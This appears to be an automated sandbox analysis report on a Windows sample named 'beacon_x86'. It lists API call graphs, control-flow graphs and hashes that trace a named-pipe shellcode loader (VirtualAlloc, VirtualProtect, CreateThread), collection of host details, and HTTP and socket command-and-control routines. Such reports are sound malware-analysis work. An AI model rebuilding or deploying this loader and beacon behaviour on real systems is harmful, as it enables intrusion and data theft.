21324->21326 21325 d61db9 InternetQueryDataAvailable 21327 d61e2e InternetCloseHandle 21325->21327 21328 d61dca 21325->21328 21329 d61e2a 21326->21329 21327->21329 21328->21327 21332 d61dd2 21328->21332 21329->20981 21330 d61ddb InternetReadFile 21331 d61e08 21330->21331 21330->21332 21331->21324 21333 d61e0d InternetCloseHandle 21331->21333 21332->21324 21332->21326 21332->21330 21332->21331 21334 d61e1f ___DllMainCRTStartup 21333->21334 21356 d68afe 45 API calls 3 library calls 21334->21356 21337 d68c58 21336->21337 21338 d671bc ___DllMainCRTStartup 45 API calls 21337->21338 21339 d68c6f ___DllMainCRTStartup 21338->21339 21339->21304 21341 d618c9 ___DllMainCRTStartup 21340->21341 21342 d618ff ___DllMainCRTStartup 21341->21342 21343 d618cd InternetQueryOptionA InternetSetOptionA 21341->21343 21344 d6190b InternetSetStatusCallback 21342->21344 21345 d61919 HttpSendRequestA 21342->21345 21343->21342 21344->21345 21346 d68cc6 21345->21346 21347 d67207 ___DllMainCRTStartup 45 API calls 21346->21347 21348 d61da0 21347->21348 21349 d6191b HttpQueryInfoA 21348->21349 21350 d61947 21349->21350 21351 d61949 21349->21351 21350->21324 21350->21325 21357 d77be9 53 API calls __wcstoi64 21351->21357 21354->21309 21355->21307 21356->21329 21359 d67da4 21358->21359 21375 d67b43 21358->21375 21359->20986 21360 d67b52 htonl select 21361 d67bca __WSAFDIsSet 21360->21361 21360->21375 21363 d67be1 accept ioctlsocket 21361->21363 21361->21375 21362 d67c7f __WSAFDIsSet 21365 d67c96 accept 21362->21365 21362->21375 21364 d67da6 closesocket 21363->21364 21384 d67c0b ___DllMainCRTStartup 21363->21384 21364->21359 21401 d66e11 ioctlsocket 21365->21401 21366 d67ce4 __WSAFDIsSet 21368 d67cf1 __WSAFDIsSet 21366->21368 21366->21375 21369 d67d75 GetTickCount 21368->21369 21368->21375 21369->21375 21370 d67d14 __WSAFDIsSet 21374 d67d27 __WSAFDIsSet 21370->21374 21370->21375 21374->21369 21376 d67d3a accept 21374->21376 21375->21359 21375->21360 21375->21362 21375->21366 21375->21370 21402 d665e5 98 API calls 3 library calls 21375->21402 21404 d602d0 98 API calls ___DllMainCRTStartup 21375->21404 21378 d67d54 21376->21378 21403 d602d0 98 API calls ___DllMainCRTStartup 21378->21403 21380 d67d68 closesocket 21380->21375 21381 d6071b htonl ___DllMainCRTStartup 21381->21384 21384->21375 21384->21381 21397 d67520 46 API calls _malloc 21384->21397 21398 d606cb 45 API calls 2 library calls 21384->21398 21399 d602d0 98 API calls ___DllMainCRTStartup 21384->21399 21400 d60864 45 API calls 2 library calls 21384->21400 21386 d67e70 21385->21386 21389 d67e7a 21385->21389 21387 d777ff _malloc 45 API calls 21386->21387 21387->21389 21388 d67f99 21388->20986 21389->21388 21390 d67ea1 htonl recvfrom 21389->21390 21391 d67f0e htonl ioctlsocket 21389->21391 21393 d67f40 21389->21393 21394 d602d0 98 API calls ___DllMainCRTStartup 21389->21394 21390->21389 21392 d67edb WSAGetLastError 21390->21392 21391->21389 21392->21389 21393->21389 21405 d674d4 recv shutdown closesocket 21393->21405 21394->21389 21396->20989 21397->21384 21398->21384 21399->21384 21400->21384 21401->21375 21402->21375 21403->21380 21404->21375 21405->21393 21407 d64662 21406->21407 21415 d6469d 21406->21415 21409 d777ff _malloc 45 API calls 21407->21409 21411 d64669 21409->21411 21412 d6da37 ___DllMainCRTStartup 50 API calls 21411->21412 21413 d6467a ___DllMainCRTStartup 21412->21413 21414 d6dfea ___DllMainCRTStartup 3 API calls 21413->21414 21414->21415 21421 d6dbe5 21415->21421 21416 3e10000 21417 3e1000d Sleep 21416->21417 21419 3e100a9 21417->21419 21419->21001 21420->20999 21422 d6dbf5 21421->21422 21423 d6dc26 21422->21423 21424 d77722 ___crtwsetenv 45 API calls 21422->21424 21426 d644d5 21422->21426 21425 d777ff _malloc 45 API calls 21423->21425 21424->21423 21425->21426 21426->21416 21493 d68dc2 htonl 21494 d87dc0 GetSystemTimeAsFileTime _clock 21590 401e35 12 API calls 21591 d68fc8 107 API calls 21496 401160 34 API calls 21592 d66bf4 FlushFileBuffers 21594 d67ffe 107 API calls ___DllMainCRTStartup 21497 d66dfc recv WSAGetLastError Sleep 21596 d68ffa 77 API calls 21499 d68dfb 100 API calls 21500 d68dee 77 API calls 21501 40215d signal signal signal signal 21502 401500 _onexit 21503 d68d92 107 API calls 21601 401b0b 7 API calls 21602 d68f9a 116 API calls 21506 402110 8 API calls 21507 d69184 101 API calls 21508 401114 __getmainargs 21509 d60982 104 API calls 3 library calls 21510 d68d82 110 API calls 21603 d68f8a 122 API calls 21512 d68db2 10 API calls 21514 d7c5bd TlsAlloc 21606 402330 calloc EnterCriticalSection LeaveCriticalSection 21609 d66ba5 WriteFile 21516 d66da2 send 21517 d68da2 7 API calls 21611 d68faa 101 API calls 20578 4013c1 20579 4013c8 20578->20579 20580 4011da 20579->20580 20581 4013db _amsg_exit 20579->20581 20582 401460 _initterm 20580->20582 20583 4011e7 20580->20583 20584 4013f5 _initterm 20581->20584 20587 4011ff 20581->20587 20585 401483 exit 20582->20585 20583->20584 20583->20587 20584->20587 20604 401e20 20587->20604 20588 401231 SetUnhandledExceptionFilter 20590 401252 20588->20590 20591 401257 __p__acmdln 20590->20591 20595 40126e malloc 20591->20595 20593 401301 20594 401310 strlen malloc memcpy 20593->20594 20594->20594 20596 401346 20594->20596 20595->20585 20595->20593 20619 401960 20596->20619 20598 40135f 20624 4029e0 20598->20624 20609 401e35 20604->20609 20616 401e40 20604->20616 20605 402030 20606 402041 20605->20606 20605->20609 20612 401f9d 20606->20612 20630 401ce0 11 API calls 20606->20630 20607 402082 20631 401c80 11 API calls 20607->20631 20609->20588 20611 402092 20611->20588 20617 401fa0 20612->20617 20613 401ed0 20613->20605 20613->20612 20614 401ce0 11 API calls 20613->20614 20613->20616 20629 401c80 11 API calls 20613->20629 20614->20613 20616->20605 20616->20607 20616->20609 20616->20613 20616->20617 20617->20609 20618 401fd2 VirtualProtect 20617->20618 20618->20617 20620 401969 20619->20620 20622 401900 20619->20622 20620->20598 20632 4014e0 _onexit 20622->20632 20623 401930 20623->20598 20625 401960 _onexit 20624->20625 20626 4029f6 20625->20626 20633 401805 GetTickCount sprintf CreateThread 20626->20633 20629->20616 20630->20606 20631->20611 20632->20623 20634 4016e1 20633->20634 20637 40161c CreateNamedPipeA 20634->20637 20638 401682 ConnectNamedPipe 20637->20638 20639 4016d9 20637->20639 20638->20639 20640 401699 20638->20640 20641 4016c4 CloseHandle 20640->20641 20642 40169d WriteFile 20640->20642 20641->20639 20642->20641 20643 4016d0 20642->20643 20643->20640 21612 d66b52 ReadFile ___DllMainCRTStartup 21518 d68d50 110 API calls 21614 d68f5a 99 API calls 21520 d7055a 50 API calls 21616 d61346 126 API calls ___DllMainCRTStartup 21617 d6fb45 5 API calls 3 library calls 21523 d6dd4f 51 API calls 21524 d66d4d recv 21618 d68f4a 47 API calls 21525 d86945 19 API calls ___DllMainCRTStartup 21620 d68f7a 112 API calls 21622 401bf0 fprintf 21529 d69160 htonl htonl htonl htonl 21530 d68d60 127 API calls 21531 d6356f CryptGenRandom CryptReleaseContext GetSystemTimeAsFileTime ___DllMainCRTStartup 21533 d6916a 101 API calls 21623 d68f6a 81 API calls 21536 d63112 8 API calls 2 library calls 21538 d66507 45 API calls 2 library calls 21539 d68cfd 156 API calls 21626 d66303 110 API calls 2 library calls 21627 d60b09 53 API calls ___DllMainCRTStartup 21540 4011a3 33 API calls 21628 4023a5 EnterCriticalSection free LeaveCriticalSection 21541 d68cfd 107 API calls 21543 d6913f 115 API calls 21427 4017ac malloc 21428 4017c2 Sleep 21427->21428 21434 401700 CreateFileA 21428->21434 21431 4017e5 21439 40156c VirtualAlloc 21431->21439 21433 4017fe 21435 4017a4 21434->21435 21436 40175f 21434->21436 21435->21428 21435->21431 21437 401763 ReadFile 21436->21437 21438 40178a CloseHandle 21436->21438 21437->21436 21437->21438 21438->21435 21440 40159f 21439->21440 21441 4015c2 VirtualProtect CreateThread 21440->21441 21441->21433 21442 401530 21441->21442 21630 d68f3a 105 API calls 21544 4025b0 strlen strncmp 21631 d68f26 112 API calls 21545 d68d2e SetCurrentDirectoryA 21633 d85320 75 API calls 6 library calls

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1 40116c-40118a 2 401430-40143c GetStartupInfoA 1->2 3 401190-4011a1 1->3 4 4011bc-4011c8 3->4 5 4011a8-4011aa 4->5 6 4011ca-4011d4 4->6 9 4011b0-4011b9 Sleep 5->9 10 4013c8-4013d5 5->10 7 4011da-4011e1 6->7 8 4013db-4013ef _amsg_exit 6->8 11 401460-401479 _initterm 7->11 12 4011e7-4011f9 7->12 13 4013f5-401415 _initterm 8->13 14 4011ff-401201 8->14 9->4 10->7 10->8 19 401483 11->19 12->13 12->14 15 401207-40120e 13->15 16 40141b-401421 13->16 14->15 14->16 17 401210-401229 15->17 18 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 15->18 16->15 17->18 28 401281-401287 18->28 29 40126e 18->29 23 40148b-40149a exit 19->23 31 401270-401272 28->31 32 401289-401294 28->32 30 4012bd-4012c5 29->30 33 4012c7-4012d0 30->33 34 4012db-4012fb malloc 30->34 35 401274-401277 31->35 36 4012b8 31->36 37 40127e 32->37 38 4012d6 33->38 39 4013b8-4013bc 33->39 34->19 40 401301-40130d 34->40 41 4012a0-4012a2 35->41 42 401279 35->42 36->30 37->28 38->34 39->38 43 401310-401344 strlen malloc memcpy 40->43 41->36 44 4012a4 41->44 42->37 43->43 46 401346-401393 call 401960 call 4029e0 43->46 45 4012a8-4012b1 44->45 45->36 47 4012b3-4012b6 45->47 46->23 52 401399-4013a1 46->52 47->36 47->45 53 4013a7-4013b2 52->53 54 401448-40145d _cexit 52->54
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
          • String ID:
          • API String ID: 1672962128-0
          • Opcode ID: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
          • Instruction ID: cd1cdbe7929d0bdf955f1aec1ac9dc0fa1fb6e5342f4dd5585025b5f235b2fbc
          • Opcode Fuzzy Hash: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
          • Instruction Fuzzy Hash: 13817BB5A043058FDB10DF69E98476E77E0FB49305F00443EEA84AB3A2D779D845CB8A

          Control-flow Graph

          APIs
          • _memset.LIBCMT ref: 00D61C80
          • __snprintf.LIBCMT ref: 00D61CA7
            • Part of subcall function 00D685F6: _memset.LIBCMT ref: 00D68617
          • __snprintf.LIBCMT ref: 00D61D23
          • __snprintf.LIBCMT ref: 00D61D3A
          • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00D90540,00D9EFC4), ref: 00D61D69
          • HttpSendRequestA.WININET(00000000,?,?,00D61E54,?), ref: 00D61D92
          • InternetCloseHandle.WININET(00000000), ref: 00D61DAF
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64EFC
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F08
            • Part of subcall function 00D64EEC: __snprintf.LIBCMT ref: 00D64F59
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F90
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F9B
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D64FC6
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D64FD2
            • Part of subcall function 00D64FB6: __snprintf.LIBCMT ref: 00D6502E
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D6504C
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D65057
          • InternetQueryDataAvailable.WININET(00000000,00D6058B,00000000,00000000), ref: 00D61DC0
          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00D61DEE
          • InternetCloseHandle.WININET(00000000), ref: 00D61E0E
          • InternetCloseHandle.WININET(00000000), ref: 00D61E2F
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
          • String ID:
          • API String ID: 2172916581-0
          • Opcode ID: d48334b5bd3b3e3fab214b5022b64094c29907015d3934fe2cb822df40069d5d
          • Instruction ID: 30aaeb06961bf1a6a352b22a412fafcac4f8d1b70054e997ab50c31d5dc2e8c6
          • Opcode Fuzzy Hash: d48334b5bd3b3e3fab214b5022b64094c29907015d3934fe2cb822df40069d5d
          • Instruction Fuzzy Hash: 4D519C76900219BFDF11AFA8DC85EAE7BBCEF04310B084066FA14E72A1DB3199449B71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 108 4013c1-4013d5 110 4011da-4011e1 108->110 111 4013db-4013ef _amsg_exit 108->111 112 401460-401479 _initterm 110->112 113 4011e7-4011f9 110->113 114 4013f5-401415 _initterm 111->114 115 4011ff-401201 111->115 120 401483 112->120 113->114 113->115 116 401207-40120e 114->116 117 40141b-401421 114->117 115->116 115->117 118 401210-401229 116->118 119 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 116->119 117->116 118->119 129 401281-401287 119->129 130 40126e 119->130 124 40148b-40149a exit 120->124 132 401270-401272 129->132 133 401289-401294 129->133 131 4012bd-4012c5 130->131 134 4012c7-4012d0 131->134 135 4012db-4012fb malloc 131->135 136 401274-401277 132->136 137 4012b8 132->137 138 40127e 133->138 139 4012d6 134->139 140 4013b8-4013bc 134->140 135->120 141 401301-40130d 135->141 142 4012a0-4012a2 136->142 143 401279 136->143 137->131 138->129 139->135 140->139 144 401310-401344 strlen malloc memcpy 141->144 142->137 145 4012a4 142->145 143->138 144->144 147 401346-401381 call 401960 call 4029e0 144->147 146 4012a8-4012b1 145->146 146->137 148 4012b3-4012b6 146->148 152 401386-401393 147->152 148->137 148->146 152->124 153 401399-4013a1 152->153 154 4013a7-4013b2 153->154 155 401448-40145d _cexit 153->155
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
          • String ID:
          • API String ID: 2053141405-0
          • Opcode ID: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
          • Instruction ID: 176527dceee54676b3400d832f202c7b1996cfd354b1dcf2f579e8dd7b9a5ba8
          • Opcode Fuzzy Hash: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
          • Instruction Fuzzy Hash: 974118B4A043058FDB10EF65E98575EBBE0FB48705F10843EE984A73A2D7B8D845CB59

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 156 4011a3-4011a7 157 4011a8-4011aa 156->157 158 4011b0-4011c8 Sleep 157->158 159 4013c8-4013d5 157->159 158->157 163 4011ca-4011d4 158->163 160 4011da-4011e1 159->160 161 4013db-4013ef _amsg_exit 159->161 164 401460-401479 _initterm 160->164 165 4011e7-4011f9 160->165 166 4013f5-401415 _initterm 161->166 167 4011ff-401201 161->167 163->160 163->161 172 401483 164->172 165->166 165->167 168 401207-40120e 166->168 169 40141b-401421 166->169 167->168 167->169 170 401210-401229 168->170 171 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 168->171 169->168 170->171 181 401281-401287 171->181 182 40126e 171->182 176 40148b-40149a exit 172->176 184 401270-401272 181->184 185 401289-401294 181->185 183 4012bd-4012c5 182->183 186 4012c7-4012d0 183->186 187 4012db-4012fb malloc 183->187 188 401274-401277 184->188 189 4012b8 184->189 190 40127e 185->190 191 4012d6 186->191 192 4013b8-4013bc 186->192 187->172 193 401301-40130d 187->193 194 4012a0-4012a2 188->194 195 401279 188->195 189->183 190->181 191->187 192->191 196 401310-401344 strlen malloc memcpy 193->196 194->189 197 4012a4 194->197 195->190 196->196 199 401346-401393 call 401960 call 4029e0 196->199 198 4012a8-4012b1 197->198 198->189 200 4012b3-4012b6 198->200 199->176 205 401399-4013a1 199->205 200->189 200->198 206 4013a7-4013b2 205->206 207 401448-40145d _cexit 205->207
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
          • String ID:
          • API String ID: 2230096795-0
          • Opcode ID: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
          • Instruction ID: ee64299d2f4f8c50c0c592fa26e83c8470f2d6fe6e7dfb634f206cb54a3f681e
          • Opcode Fuzzy Hash: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
          • Instruction Fuzzy Hash: 7F4107B4A043058FDB10DF69E98471EBBE0BB48705F14453EE988A73A2D778D845CB99

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 208 401160-40118a 210 401430-40143c GetStartupInfoA 208->210 211 401190-4011a1 208->211 212 4011bc-4011c8 211->212 213 4011a8-4011aa 212->213 214 4011ca-4011d4 212->214 217 4011b0-4011b9 Sleep 213->217 218 4013c8-4013d5 213->218 215 4011da-4011e1 214->215 216 4013db-4013ef _amsg_exit 214->216 219 401460-401479 _initterm 215->219 220 4011e7-4011f9 215->220 221 4013f5-401415 _initterm 216->221 222 4011ff-401201 216->222 217->212 218->215 218->216 227 401483 219->227 220->221 220->222 223 401207-40120e 221->223 224 40141b-401421 221->224 222->223 222->224 225 401210-401229 223->225 226 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 223->226 224->223 225->226 236 401281-401287 226->236 237 40126e 226->237 231 40148b-40149a exit 227->231 239 401270-401272 236->239 240 401289-401294 236->240 238 4012bd-4012c5 237->238 241 4012c7-4012d0 238->241 242 4012db-4012fb malloc 238->242 243 401274-401277 239->243 244 4012b8 239->244 245 40127e 240->245 246 4012d6 241->246 247 4013b8-4013bc 241->247 242->227 248 401301-40130d 242->248 249 4012a0-4012a2 243->249 250 401279 243->250 244->238 245->236 246->242 247->246 251 401310-401344 strlen malloc memcpy 248->251 249->244 252 4012a4 249->252 250->245 251->251 254 401346-401393 call 401960 call 4029e0 251->254 253 4012a8-4012b1 252->253 253->244 255 4012b3-4012b6 253->255 254->231 260 401399-4013a1 254->260 255->244 255->253 261 4013a7-4013b2 260->261 262 401448-40145d _cexit 260->262
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
          • String ID:
          • API String ID: 1672962128-0
          • Opcode ID: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
          • Instruction ID: 14d090d825811c9464361f5f824c2d109dd69b69c83bbf3de982eb4becc4467a
          • Opcode Fuzzy Hash: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
          • Instruction Fuzzy Hash: ED5168B5A043058FDB10DFA9E984B1ABBE0FB48705F10453EE944AB3A2D778D845CB99

          Control-flow Graph

          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • GetUserNameA.ADVAPI32(?,?), ref: 00D66F6E
          • GetComputerNameA.KERNEL32(?,?), ref: 00D66F7E
          • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 00D66F92
          • _strrchr.LIBCMT ref: 00D66FA1
          • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00D66FBC
          • __snprintf.LIBCMT ref: 00D67028
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
          • String ID:
          • API String ID: 1877169212-0
          • Opcode ID: 9cbe285380393897ebbd6306711faf68e57ccee7ff3af0a10fbc893cdd81d4a9
          • Instruction ID: 1241ad72e6cbc34bcce63733562af70db8b04f40939db6cf542a2117c23c1a0c
          • Opcode Fuzzy Hash: 9cbe285380393897ebbd6306711faf68e57ccee7ff3af0a10fbc893cdd81d4a9
          • Instruction Fuzzy Hash: 5041BC75D00209AFDF11AFA5EC4ADBEBFB4EF04300F14405AF900A6292EB759A50AB70

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 608 40161c-401680 CreateNamedPipeA 609 401682-401697 ConnectNamedPipe 608->609 610 4016d9-4016e0 608->610 609->610 611 401699-40169b 609->611 612 4016c4-4016ce CloseHandle 611->612 613 40169d-4016c2 WriteFile 611->613 612->610 613->612 614 4016d0-4016d7 613->614 614->611
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
          • String ID:
          • API String ID: 2239253087-0
          • Opcode ID: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
          • Instruction ID: 647ba10e4562674360e559436f846850fae7207d816ad69ae546ddef800915d1
          • Opcode Fuzzy Hash: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
          • Instruction Fuzzy Hash: C1114CB0804305AFD7109F66C84836FBBF8EB84359F00892EE895973A1D37AC4488F96

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 615 d6df82-d6dfa9 617 d6dfc2-d6dfd5 CryptGenRandom 615->617 618 d6dfab-d6dfbc 615->618 619 d6dfe6-d6dfe8 617->619 620 d6dfd7-d6dfe4 CryptReleaseContext 617->620 618->617 622 d6dfbe-d6dfc1 618->622 619->620 620->622
          APIs
          • CryptGenRandom.ADVAPI32(00000000,00D67090,?,?,?,00D6DFF8,?,00D67090,?,00D67090,?), ref: 00D6DFCC
          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,00D6DFF8,?,00D67090,?,00D67090,?), ref: 00D6DFDC
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Crypt$ContextRandomRelease
          • String ID: Microsoft Base Cryptographic Provider v1.0
          • API String ID: 3163166064-291530887
          • Opcode ID: 6298e278e507f0f3f167548c9fb139467626c16076945c46857cd9897571e720
          • Instruction ID: cd94c8d16a3e823f2cbb4fec3f25dfee6c080012e0783fd790f64da3f61d6022
          • Opcode Fuzzy Hash: 6298e278e507f0f3f167548c9fb139467626c16076945c46857cd9897571e720
          • Instruction Fuzzy Hash: C4F08C36E14268B7EF208A959C09F8E7A6DEB44754F204051FA02E6144C271AA00A7B4
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3883582729.0000000003E10000.00000020.00000800.00020000.00000000.sdmp, Offset: 03E10000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3e10000_beacon_x86.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
          • Instruction ID: 4160619bc4f4c0e7b71b9f1ccef9a06bf0e686ac5f9153f2a358215c543cf314
          • Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
          • Instruction Fuzzy Hash: EA41AF35600605DFCB15CF1DC880A69BBF2FF89354B29D5AEE49A8B312D631ED91CB50
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID: p=Fw
          • API String ID: 0-243926367
          • Opcode ID: 8562e0df8917731d5152cd1d8b178c026485e9e446a185d67981b8935031a2c6
          • Instruction ID: 2e8cffe142bc4412bc885e306d0a61ff20ce8c167c1b985b8054fc365109c3bf
          • Opcode Fuzzy Hash: 8562e0df8917731d5152cd1d8b178c026485e9e446a185d67981b8935031a2c6
          • Instruction Fuzzy Hash: E0D0123220D2489ADA51EB14FCC25797310E740311F908EA9EA0D025457E66AD655671

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 401805-4018b9 GetTickCount sprintf CreateThread
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CountCreateThreadTicksprintf
          • String ID: .$\$\$\$\$e$i$p$p
          • API String ID: 1367138260-609229641
          • Opcode ID: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
          • Instruction ID: 85e9528532d9762a1f7b070758f0f1347f94744085bed28000c50463c0499d60
